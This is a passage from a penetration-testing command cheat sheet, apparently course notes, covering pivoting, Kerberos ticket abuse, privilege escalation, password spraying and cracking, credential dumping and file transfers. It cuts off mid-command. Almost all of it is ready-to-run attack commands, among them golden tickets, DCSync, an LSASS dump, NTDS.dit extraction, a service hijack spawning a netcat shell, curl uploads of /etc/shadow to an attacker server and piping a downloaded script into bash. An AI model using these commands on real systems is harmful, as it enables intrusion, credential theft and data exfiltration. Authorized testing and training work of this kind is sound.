aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba C:\> .\Rubeus.exe asktgt /user:$ /=/ptt mimikatz # lsadump::dcsync /user:\krbtgt - Juicy Potato https://github.com/ohpe/juicy-potato ## #4. - Lateral Movement - Network Configuration C:\> ipconfig $ ifconfig - Routing Table C:\> netstat -r $ netstat -r - Network Connections C:\> netstat -ano $ netstat -antp - Local Port Forwarding $ ssh -L 1234:localhost:5432 @ $ ssh -L 1234:localhost:3306 -L 8080:localhost:80 @ - Remote Port Forwarding $ ssh -R :8080:0.0.0.0:80 @ -vN - Dynamic Port Forwarding $ ssh -D 9050 @ - SOCKS Proxy Metasploit Module (run Autoroute after this) msf6 > use auxiliary/server/socks_proxy msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050 msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0 msf6 auxiliary(server/socks_proxy) > set version 4a msf6 auxiliary(server/socks_proxy) > run msf6 auxiliary(server/socks_proxy) > jobs - Autoroute Metasploit Module (run SOCKS Proxy before this) msf6 > use post/multi/manage/autoroute msf6 post(multi/manage/autoroute) > set SESSION 1 msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0 msf6 post(multi/manage/autoroute) > run OR meterpreter > run autoroute -s 172.16.5.0/23 meterpreter > run autoroute -p - Proxychains Edit /etc/proxychains4.conf OR /etc/proxychains.conf Edit [ProxyList] e.g. socks4 127.0.0.1 9050 OR socks5 127.0.0.1 9050 $ proxychains # Note that the -sT option is required when using Nmap with ProxyChains - also use sudo $ sudo proxychains -q nmap -sT -Pn 172.16.119.13 --open - Proxychains Web Traffic Edit /etc/proxychains4.conf Edit [ProxyList] e.g. socks4 127.0.0.1 9050 OR socks5 127.0.0.1 9050 $ proxychains firefox-esr :80 - Proxychains with Kerberos Edit /etc/proxychains4.conf Edit [ProxyList] e.g. 127.0.0.1 9050 # To use the Kerberos ticket, we need to specify our target machine name (not the IP address) and use the option -k. If we get a prompt for a password, we can also include the option -no-pass $ proxychains -k - Proxifier https://www.proxifier.com/ - Chisel # Depending on the version of the glibc library installed on both (target and workstation) systems, there might be discrepancies that could result in an error. When this happens, it is important to compare the versions of the library on both systems, or we can use an older prebuilt version of chisel, which can be found in the Releases section of the GitHub repository https://github.com/jpillora/chisel $ cd chisel $ go build $ sudo ./chisel server -v -p 8000 --reverse --socks5 $ ./chisel client -v :8000 R:socks $ sudo ./chisel server -v -p 1234 --socks5 $ ./chisel client -v 10.129.202.64:1234 socks - Sshuttle $ sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v - Socat $ socat TCP4-LISTEN:8080,fork TCP4::80 - Rpivot https://github.com/klsecservices/rpivot $ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 $ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999 $ python client.py --server-ip --server-port 8080 --ntlm-proxy-ip --ntlm-proxy-port 8081 --domain --username --password - Dnscat2 https://github.com/iagox86/dnscat2 $ cd dnscat2/server/ $ sudo gem install bundler $ sudo bundle install $ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache - Dnscat2 PowerShell https://github.com/lukebaggett/dnscat2-powershell PS C:\> Import-Module dnscat2.ps1 PS C:\> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd dnscat2> ? dnscat2> window -i 1 - Ptunnel-ng https://github.com/utoni/ptunnel-ng $ sudo apt install automake autoconf -y $ cd ptunnel-ng/ $ sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh $ sudo ./autogen.sh $ sudo ./ptunnel-ng -r10.129.202.64 -R22 $ sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22 - SocksOverRDP https://github.com/nccgroup/SocksOverRDP C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll - Meterpreter Portfwd meterpreter > portfwd add -l 3300 -p 3389 -r meterpreter > portfwd add -R -l 8081 -p 1234 -L - Plink C:\> plink -D 9050 ubuntu@ - Netsh C:\> netsh.exe interface portproxy show v4tov4 C:\> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25 - PsExec $ python psexec.py :''@ $ python psexec.py @ $ python psexec.py /:''@ $ psexec.py /@ -k -no-pass -target-ip - Runas C:\> runas /savecred /user: cmd - PowerShell Remoting PS C:\> Enter-PSSession -ComputerName PS C:\> Enter-PSSession -ComputerName -Credential $cred PS C:\> Enter-PSSession -ComputerName -Credential \ - Evil-WinRM $ evil-winrm -i -u -p $ evil-winrm -i -u -H - Evil-WinRM with Kerberos # While installing, we'll get a prompt for the Kerberos realm. Use the domain name, and the KDC $ sudo apt-get install krb5-user -y OR # Edit this file if already installed $ cat /etc/krb5.conf $ proxychains evil-winrm -i -r - Mimikatz Pass-The-Hash (PTH) C:\> mimikatz.exe privilege::debug "sekurlsa::pth /user: /rc4: /domain: /run:cmd.exe" exit - Invoke-TheHash (PTH) PS C:\> Import-Module .\Invoke-TheHash.psd1 PS C:\> Invoke-SMBExec -Target -Domain -Username -Hash -Command "" -Verbose PS C:\> Invoke-WMIExec -Target -Domain -Username -Hash -Command "" -Verbose - Impacket (PTH) $ impacket-psexec @ -hashes : $ impacket-wmiexec @ -hashes : $ impacket-atexec @ -hashes : $ impacket-smbexec @ -hashes : - Netexec (PTH) $ netexec smb -u -d . -H $ netexec smb -u -d . -H -x whoami - Evil-winrm (PTH) $ evil-winrm -i -u -H $ evil-winrm -i -u -H - Xfreerdp (PTH) # Disable Restricted Admin Mode on the target C:\> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f $ xfreerdp /v: /u: /pth: - List Tickets C:\> klist C>\> Rubeus.exe klist mimikatz # kerberos::list - Base64 Encoded Tickets mimikatz # base64 /out:true # ensures TGS tickets are extracted in base64 format $ echo "" | tr -d \\n # used to prepare the base64 formatted TGS ticket for cracking from Linux-based host $ cat encoded_file | base64 -d > sqldev.kirbi - Request TGS From User PS C:\> Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433" - Request TGS All Users C:\> setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() } - Mimikatz Export Tickets C:\> mimikatz.exe privilege::debug "sekurlsa::tickets /export" C:\> mimikatz.exe privilege::debug "kerberos::list /export" C:\> dir *.kirb - Rubeus Export Tickets C:\> Rubeus.exe dump /nowrap - Mimikatz Pass-The-Ticket (PTT) mimikatz # kerberos::ptt "" - Rubeus Pass-The-Ticket (PTT) C:\> Rubeus.exe ptt /ticket: C:\> Rubeus.exe ptt /ticket: - Convert .kirbi to Base64 Format PS C:\> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\")) - Mimikatz OverPass-The-Hash (OPTH) # Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't mimikatz # sekurlsa::pth /domain: /user: /ntlm: - Rubeus OverPass-The-Hash (OPTH) # Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't C:\> Rubeus.exe asktgt /domain: /user: /aes256: /nowrap - Rubeus OverPass-The-Hash (OPTH) -> Rubeus Pass-The-Ticket (PTT) C:\> Rubeus.exe asktgt /domain: /user: /rc4: /ptt C:\> Rubeus.exe asktgt /domain: /user: /aes256: /ptt - Rubeus Sacrificial Process C:\> Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show - Check if Linux is domain-joined $ realm list $ ps -ef | grep -i "winbind\|sssd" - Find Linux KeyTab Files # To use a keytab file, we must have read and write (rw) privileges on the file $ find / -name *keytab* -ls 2>/dev/null - Find Linux KeyTab Files in Cronjobs $ crontab -l - List Linux KeyTab File Information $ klist -k -t /opt/specialfiles/carlos.keytab - Impersonate a User With Linux KeyTab File # kinit is case-sensitive, so be sure to use the name of the principal as shown in klist. In this case, the username is lowercase, and the domain name is uppercase # To keep the ticket from the current session, before importing the keytab, save a copy of the ccache file present in the environment variable KRB5CCNAME $ kinit carlos@ -k -t /opt/specialfiles/carlos.keytab - Extract Linux KeyTab Hashes https://github.com/sosdave/KeyTabExtract $ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab - Find Linux Ccache Files # Check KRB5CCNAME environment variable $ env | grep -i krb5 $ ls -la /tmp - Impersonate a User With Linux Ccache File # cp /tmp/krb5cc_647401106_I8I133 . # export KRB5CCNAME=/root/krb5cc_647401106_I8I133 # klist - Convert Linux Ccache File to a Windows .kirbi File https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py $ impacket-ticketConverter krb5cc_647401106_I8I133 - Convert Windows .kirbi File to a Linux Ccache File https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py $ impacket-ticketConverter krb5cc_647401106_I8I133 - Linkatz https://github.com/CiscoCXSecurity/linikatz $ ./linikatz.sh - AD CS NTLM Relay Attack (ESC8) $ impacket-ntlmrelayx -t http://10.129.234.110/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication - Printer Bug Exploitation https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py $ python3 printerbug.py INLANEFREIGHT.LOCAL/wwhite:"package5shores_topher1"@10.129.234.109 10.10.16.12 PS C:\> Get-SpoolStatus -ComputerName - Pass-The-Certificate (PTC) https://github.com/dirkjanm/PKINITtools/blob/master/gettgtpkinit.py $ python3 -m venv .venv $ source .venv/bin/activate $ pip3 install -r requirements.txt # If you encounter error stating "Error detecting the version of libcrypto", it can be fixed by installing the oscrypto library $ pip3 install -I git+https://github.com/wbond/oscrypto.git $ python3 gettgtpkinit.py -cert-pfx ../krbrelayx/DC01\$.pfx -dc-ip 10.129.234.109 'inlanefreight.local/dc01$' /tmp/dc.ccache - Shadow Credentials (msDS-KeyCredentialLink) https://github.com/ShutdownRepo/pywhisker $ pywhisker --dc-ip 10.129.234.109 -d INLANEFREIGHT.LOCAL -u wwhite -p 'package5shores_topher1' --target jpinkman --action add $ python3 gettgtpkinit.py -cert-pfx ../eFUVVTPf.pfx -pfx-pass 'bmRH4LK7UwPrAOfvIx6W' -dc-ip 10.129.234.109 INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache - Create a PSCredential Object PS C:\> $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword) - Create a SecureString Object PS C:\> $password = ConvertTo-SecureString '' -AsPlainText -Force - Mimikatz Golden Ticket mimikatz # kerberos::golden /user: /domain: /sid: /krbtgt:9d765b482771505cbe97411065964d5f /sids: /ptt - Rubeus Golden Ticket C:\> .\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain: /sid: /sids: /user: /ptt - Ticketer Golden Ticket $ ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 ## #5. - Privilege Escalation - Sudo $ sudo -l $ sudo -u /bin/bash - SUID https://github.com/Anon-Exploiter/SUID3NUM - WinPEAS https://github.com/carlospolop/PEASS-ng - LinPEAS https://github.com/carlospolop/PEASS-ng - LinEnum https://github.com/rebootuser/LinEnum - Linuxprivchecker https://github.com/sleventyeleven/linuxprivchecker - Capabilities $ getcap -r / 2>/dev/null CAP_SETUID - Python >>> import os >>> os.setuid(0) >>> os.system("/bin/bash") $ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' - Seatbelt https://github.com/GhostPack/Seatbelt - JAWS https://github.com/411Hall/JAWS - Weak Service C:\> sc.exe config binPath=C:\Windows\Temp\nc.exe -e cmd.exe " C:\> sc.exe stop C:\> sc.exe start - Cron Jobs $ ls /etc/crontab $ ls /etc/cron.d $ ls /var/spool/cron/crontabs/root - Vulnerable Software $ dpkg -l C:\> dir "C:\Program Files" C:\> dir "C:\Program Files (x86)" - Exposed Credentials $ cat .bash_history PS C:\> Get-Content (Get-PSReadlineOption).HistorySavePath - SSH Key Login $ cat /home/user/.ssh/id_rsa $ cat /root/.ssh/id_rsa $ chmod 600 id_rsa $ ssh @ -i id_rsa - SSH Authorized Keys $ ssh-keygen -f key $ cat key.pub $ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys $ ssh @ -i key - Whoami C:\> whoami /priv - Add User To Administrators C:\> net localgroup administrators james /add - Windows Exploit Suggester https://github.com/AonCyberLabs/Windows-Exploit-Suggester (On Kali) $ ./windows-exploit-suggester.py --update $ install python-xlrd $ pip install xlrd --upgrade feed it "systeminfo" input, and point it to the microsoft database $ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt - Metasploit msf> use post/multi/recon/local_exploit_suggester - PowerUpSQL https://github.com/netspi/PowerUpSQL PS C:\> Get-SQLInstanceDomain PS C:\> Get-SQLQuery -Verbose -Instance ",1433" -username "\" -password "" -query 'Select @@version' - RaiseChild $ raiseChild.py -target-exec / ## #6. - Brute Force - Cewl $ cewl https://www.example.com -d 4 -m 6 --lowercase -w example.wordlist - Username-Anarchy https://github.com/urbanadventurer/username-anarchy $ ./username-anarchy -i listoffirstandlastnames.txt - Linkedin2username https://github.com/initstring/linkedin2username - Insidetrust Username Wordlist https://github.com/insidetrust/statistically-likely-usernames - Kerbrute Username Enumeration $ ./kerbrute_linux_amd64 userenum --dc --domain names.txt -o valid_ad_users - LookupSID $ lookupsid.py /@ $ lookupsid.py /@ | grep "Domain SID" $ lookupsid.py /@ | grep -B12 "Enterprise Admins" - Office365 Password Spray python3 o365spray.py --validate --domain python3 o365spray.py --enum -U usernames.txt --domain python3 o365spray.py --spray -U usersnamesfound.txt -p '' --count 1 --lockout 1 --domain https://github.com/dafthack/MailSniper - Gmail/Okta Password Spray https://github.com/ustayready/CredKing - Rpcclient Password Spray $ for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority; done - Kerbrute Password Spray $ kerbrute passwordspray -d --dc names.txt - Crackmapexec Password Spray $ sudo crackmapexec smb -u names.txt -p | grep + $ sudo crackmapexec smb -u names.txt -p --continue-on-success | grep + - Crackmapexec Local Administrator Password Spray sudo crackmapexec smb --local-auth / -u administrator -H | grep + - DomainPasswordSpray https://github.com/dafthack/domainpasswordspray PS C:\> Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue - Netexec $ netexec ssh -u -p $ netexec winrm -u -p $ netexec smb -u -p --shares $ netexec smb --local-auth -u -p --sam $ netexec smb --local-auth -u -p --lsa $ netexec smb -u -p --ntds $ netexec smb -u -p -M ntdsutil $ nxc smb -u -p --spider IT --content --pattern "passw" - PCredz $ ./Pcredz -f demo.pcapng -t -v - HashID $ hashid $ hashid -j $ hashid -m - Sample Hashes https://openwall.info/wiki/john/sample-hashes https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats https://hashcat.net/wiki/doku.php?id=example_hashes - Md5sum $ echo -n | md5sum - Sha1sum $ echo -n | sha1sum - Sha256sum $ echo -n | sha256sum - CrackStation https://crackstation.net/ - John The Ripper $ unshadow passwd.txt shadow.txt > unshadowed.txt $ john -w=/usr/share/wordlists/rockyou.txt hash.txt $ john --format -w=/usr/share/wordlists/rockyou.txt hash.txt $ john --single hash.txt $ john --incremental hash.txt $ john --show hash.txt - Hydra # Upgrade hydra if any errors $ hydra -l '' -p '' ssh $ hydra -L -P ssh:// $ hydra -L -P ftp:// $ hydra -L -P rdp:// $ hydra -L -P smb:// $ hydra -C ssh:// - Medusa medusa -u -P -h -M - FileInfo Formats $ file https://fileinfo.com/filetypes/encoded https://fileinfo.com/filetypes/compressed $ curl -s https://fileinfo.com/filetypes/compressed | html2text | awk '{print tolower($1)}' | grep "\." | tee -a compressed_ext.txt - Zip2john $ zip2john ZIP.zip > zip.hash $ john --wordlist= zip.hash $ john --show zip.hash - Ssh2john $ python3 ssh2john.py > ssh.hash $ john --wordlist= ssh.hash $ john --show ssh.hash - Office2john $ office2john.py Protected.docx > protected-docx.hash $ john --wordlist= protected-docx.hash $ john --show protected-docx.hash - Pdf2john $ pdf2john.pl PDF.pdf > pdf.hash $ john --wordlist= pdf.hash $ john --show pdf.hash - Bitlocker2john $ bitlocker2john -i Backup.vhd > backup.hashes $ grep "bitlocker\$0" backup.hashes > backup.hash $ hashcat -a 0 -m 22100 '' # How to mount on Linux $ sudo apt-get install dislocker $ sudo mkdir -p /media/bitlocker $ sudo mkdir -p /media/bitlockermount $ sudo losetup -f -P Backup.vhd $ sudo dislocker /dev/loop0p2 -u1234qwer -- /media/bitlocker $ sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount $ cd /media/bitlockermount/ $ ls -la $ sudo umount /media/bitlockermount $ sudo umount /media/bitlocker - Pwsafe2john $ pwsafe2john PWSAFE.psafe3 > pwsafe.hash $ john --wordlist= pwsafe.hash $ john --show pwsafe.hash - Kirbi2john $ python2.7 kirbi2john.py sqldev.kirbi # used to extract the Kerberos ticket. This also creates a file called crack_file from a Linux-based host $ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat # used to modify the crack_file for Hashcat from a Linux-based host - Hashcat $ hashcat --force password.list -r custom.rule --stdout > mut_password.list $ hashcat -a 0 -m 0 hashes.txt $ hashcat -a 0 -m 0 $ hashcat -a 0 -m 0 -r /usr/share/hashcat/rules/best64.rule $ hashcat -a 3 -m 0 '?u?l?l?l?l?d?s' $ hashcat -m 1000 ntlm-hashes.txt $ hashcat -m 1000 --show $ hashcat -m 1800 -a 0 unshadowed.txt -o /tmp/unshadowed.cracked $ hashcat -m 500 -a 0 md5-hashes.txt $ hashcat -m 2100 -a 0 $ hashcat -m 5600 -a 0 # Cannot be used for PTH, and have to be cracked to be used $ hashcat -m 13100 -a 0 --force $ hashcat -m 18200 -a 0 $ hashcat -m 22100 bitlocker-hashes.txt -o backup.cracked - Archive Cracking $ file GZIP.gzip $ for i in $(cat rockyou.txt);do openssl enc -aes-256-cbc -d -in GZIP.gzip -k $i 2>/dev/null | tar xz;done - Default Credentials https://github.com/ihebski/DefaultCreds-cheat-sheet $ pip3 install defaultcreds-cheat-sheet $ creds search linksys https://www.softwaretestinghelp.com/default-router-username-and-password-list/ ## #7. - Password Dumping - Windows Places to Hunt Passwords in Group Policy in the SYSVOL share Passwords in scripts in the SYSVOL share Password in scripts on IT shares Passwords in web.config files on dev machines and IT shares Password in unattend.xml Passwords in the AD user or computer description fields KeePass databases (if we are able to guess or crack the master password) Found on user systems and shares Files with names like pass.txt, passwords.docx, passwords.xlsx found on user systems, shares, and Sharepoint Keywords within files such as passw, user, token, key, and secret Files with extensions commonly associated with stored credentials, such as .ini, .cfg, .env, .xlsx, .ps1, and .bat Files with "interesting" names that include terms like config, user, passw, cred, or initial Search for files containing the string \ - Linux Places to Hunt Configuration files Databases Notes Scripts Cronjobs SSH keys History Files Application logs Event logs Service logs System logs /var/log/messages Generic system activity logs. /var/log/syslog Generic system activity logs. /var/log/auth.log (Debian) All authentication related logs. /var/log/secure (RedHat/CentOS) All authentication related logs. /var/log/boot.log Booting information. /var/log/dmesg Hardware and drivers related information and logs. /var/log/kern.log Kernel related warnings, errors and logs. /var/log/faillog Failed login attempts. /var/log/cron Information related to cron jobs. /var/log/mail.log All mail server related logs. /var/log/httpd All Apache related logs. /var/log/mysqld.log All MySQL server related logs. Memory and cache Keyrings e.g. browser stored credentials - Dir C:\> dir n:\*cred* /s /b C:\> dir n:\*password* /s /b C:\> dir n:\*users* /s /b C:\> dir n:\*secret* /s /b C:\> dir n:\*key* /s /b - Find $ find -name *cred* - Findstr C:\> findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml C:\> findstr /s /i cred n:\*.* - Grep $ grep -rn -ie cred - Get-ChildItem PS C:\> Get-ChildItem -Recurse -Include *.ext \\Server\Share | Select-String -Pattern "pass" PS C:\> Get-ChildItem -Recurse -Path N:\ -Include *cred* -File PS C:\> Get-ChildItem -Recurse -Path N:\ -Include *password* -File PS C:\> Get-ChildItem -Recurse -Path N:\ -Include *users* -File PS C:\> Get-ChildItem -Recurse -Path N:\ -Include *secret* -File PS C:\> Get-ChildItem -Recurse -Path N:\ -Include *key* -File - Select-String PS C:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List - Rundll32 PS C:\> Get-Process lsass PS C:\> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full - Reg ## If only want to dump the hashes of local users C:\> reg.exe save hklm\sam C:\sam.save C:\> reg.exe save hklm\system C:\system.save # If we want cached domain user credentials and machine and user keys for DPAPI C:\> reg.exe save hklm\security C:\security.save - Vssadmin C:\> vssadmin CREATE SHADOW /For=C: - NTDS.dit C:\> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit - Windows Credential Manager C:\> rundll32 keymgr.dll,KRShowKeyMgr C:\> cmdkey /list - Snaffler https://github.com/SnaffCon/Snaffler C:\> snaffler.exe -s C:\> snaffler.exe -s -d -o snaffler.log -v data - PowerHuntShares https://github.com/NetSPI/PowerHuntShares PS C:\> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public - MANSPIDER https://github.com/blacklanternsecurity/MANSPIDER $ docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider -c '' -p '!' - Pypykatz $ pypykatz lsa minidump lsass.dmp - Secretsdump $ python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL $ impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL $ impacket-secretsdump -k -no-pass -dc-ip -just-dc-user 'INLANEFREIGHT.LOCAL/DC01$'@DC01.INLANEFREIGHT.LOCAL $ secretsdump.py -outputfile -just-dc /@ -use-vss $ secretsdump.py /@ -just-dc-user LOGISTICS/krbtgt - For Loops $ for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib|fonts|share|core" ;done $ for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc|lib");do echo -e "\nFile: " $i; grep "user|password|pass" $i 2>/dev/null | grep -v "\#";done $ for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share|man";done $ find /home/* -type f -name "*.txt" -o ! -name "*.*" $ for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc|lib|headers|share";done $ for ext in $(echo ".xls .xls* .xltx .csv .od* .doc .doc* .pdf .pot .pot* .pp*");do echo -e "\nFile extension: " $ext; find / -name *$ext 2>/dev/null | grep -v "lib|fonts|share|core" ;done $ for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done - Grep $ grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1" $ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1" $ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1" $ grep -rnE '^\-{5}BEGIN [A-Z0-9]+ PRIVATE KEY\-{5}$' /* 2>/dev/null - Cron $ cat /etc/crontab $ ls -la /etc/cron.*/ $ cat /etc/cron.daily $ cat /etc/cron.hourly $ cat /etc/cron.monthly $ cat /etc/cron.weekly $ cat /etc/cron.d - Mimipenguin $ python3 mimipenguin.py $ bash mimipenguin.sh - Lazange $ python2.7 lazagne.py all $ python3 lazagne.py browsers C:\> start LaZagne.exe all - Firefox Credentials $ ls -l .mozilla/firefox/ | grep default $ cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq . - Firefox_decrypt https://github.com/unode/firefox_decrypt $ python3.9 firefox_decrypt.py - Decrypt_chrome_passwords [$ python3.9 firefox_decrypt.py](https://github.com/ohyicong/decrypt-chrome-passwords) - Mimikatz C:\> mimikatz.exe mimikatz # privilege::debug mimikatz # token::elevate mimikatz # lsadump::sam mimikatz # lsadump::lsa /patch mimikatz # lsadump::dcsync mimikatz # lsadump::dcsync /domain: /user:\ mimikatz # sekurlsa::logonpasswords mimikatz # sekurlsa::tickets mimikatz # kerberos::list mimikatz # kerberos::list /export mimikatz # kerberos::purge mimikatz # sekurlsa::credman mimikatz # vault::cred mimikatz # sekurlsa::ekeys mimikatz # misc::cmd - Rubeus C:\> .\Rubeus.exe kerberoast /stats C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap C:\> .\Rubeus.exe kerberoast /user: /nowrap C:\> .\Rubeus.exe kerberoast /domain: /user: /nowrap C:\> .\Rubeus.exe asreproast /user: /nowrap /format:hashcat - DPAPI C:\> mimikatz.exe mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect - Opasswd previous passwords $ sudo cat /etc/security/opasswd - Bash History $ cat .bash_history - Bashrc $ cat .bashrc - Bash Profile $ cat .bash_profile - Net-creds https://github.com/DanMcInerney/net-creds - Responder https://github.com/lgandx/Responder https://github.com/lgandx/Responder-Windows sudo responder -I ens224 -A - Inveigh PS C:\> (Get-Command Invoke-Inveigh).Parameters PS C:\> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y C:\> .\Inveigh.exe - SetSPN C:\> setspn.exe -Q */* - GetUserSPNs $ python GetUserSPNs.py -dc-ip / $ python GetUserSPNs.py -dc-ip / -request $ python GetUserSPNs.py -dc-ip / -request-user $ python GetUserSPNs.py -dc-ip / -request-user -outputfile $ python GetUserSPNs.py -request -target-domain / - GPPDecrypt C:\> gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE ## #8. - File Transfers - Base64 Downloads (Kali -> Windows) $ md5sum id_rsa $ cat id_rsa |base64 -w 0;echo PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("")) PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 - Base64 Downloads (Kali -> Linux) $ md5sum id_rsa $ cat id_rsa |base64 -w 0;echo $ echo -n '' | base64 -d > id_rsa $ md5sum id_rsa - Base64 Uploads (Windows -> Kali) PS C:\> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) $ echo | base64 -d > hosts $ md5sum hosts - Base64 Uploads (Linux -> Kali) $ md5sum id_rsa $ cat id_rsa |base64 -w 0;echo $ echo -n '' | base64 -d > id_rsa $ md5sum id_rsa - Netcat Downloads (Kali -> Windows) $ sudo nc -nlvp -q 0 443 < file.txt C:\> nc.exe -nv 443 > file.txt $ sudo nc -nlvp 443 > file.txt C:\> nc.exe -q 0 443 < file.txt - Ncat Downloads (Kali -> Linux) $ sudo ncat -nlvp 443 --send-only < file.txt $ ncat 443 --recv-only > file.txt OR $ cat < /dev/tcp//443 > file.txt $ sudo ncat -nlvp 443 --recv-only > file.txt $ ncat --send-only 443 < file.txt - Netcat Uploads (Windows -> Kali) C:\> nc.exe -nlvp 443 -q 0 < file.txt $ nc -nv 443 > file.txt C:\> nc.exe -nlvp 443 > file.txt $ nc -q 0 443 < file.txt - Python Web Uploads over HTTPS (Linux -> Kali) $ sudo python3 -m pip install --user uploadserver $ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' $ mkdir https && cd https $ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem $ curl -X POST https:///upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure - Python3 Server (Kali -> Windows/Kali) $ python3 -m http.server 8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash - Python3 Downloads (Kali -> Linux) $ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' - Python3 Uploads (Linux -> Kali) $ python3 -m uploadserver $ python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})' - Python2.7 Server (Kali -> Windows/Kali) $ python2.7 -m SimpleHTTPServer 8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl http://:8000/exploit.sh -o exploit.sh $ curl http://:8000/exploit.sh | bash - Python2.7 Downloads (Kali -> Linux) $ python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")' - PHP Server (Kali -> Linux) $ php -S 0.0.0.0:8000 $ wget http://:8000/exploit.sh -O exploit.sh $ curl 